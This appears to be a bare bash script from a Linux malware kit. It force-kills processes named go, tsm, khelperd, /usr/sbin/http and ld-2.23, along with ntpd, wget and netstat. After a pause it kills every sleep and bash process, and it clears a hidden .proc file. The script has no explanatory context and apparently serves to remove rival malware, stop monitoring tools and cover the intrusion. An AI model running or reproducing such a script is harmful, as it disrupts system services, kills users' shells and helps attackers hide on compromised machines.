#!/bin/bash
killall -9 go
killall -9 tsm
killall -9 /usr/sbin/http
pkill -9 watch
#kill -9 `ps x|grep run|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep go|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep tsm|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep ntpd|grep -v grep|awk '{print $1}'`
kill -9 `ps x|grep khelperd|grep -v grep|awk '{print $1}'`
#kill -9 `ps x|grep sleep|grep -v grep|awk '{print $1}'`>.proc
kill -9 `ps x|grep /usr/sbin/http|grep -v grep|awk '{print $1}'`>.proc
killall -9 wget>.out	
kill -9  `ps x|grep wget|awk '{print $1}'`>.out
pkill -9 http
pkill -9 watch
pkill -9 tsm
pkill -9 goo
pkill -9 ld-2.23
pkill -9 netstat
rm -rf .proc
sleep 5
pkill -9 sleep
pkill -9 bash
pkill -9 xs
exit 0
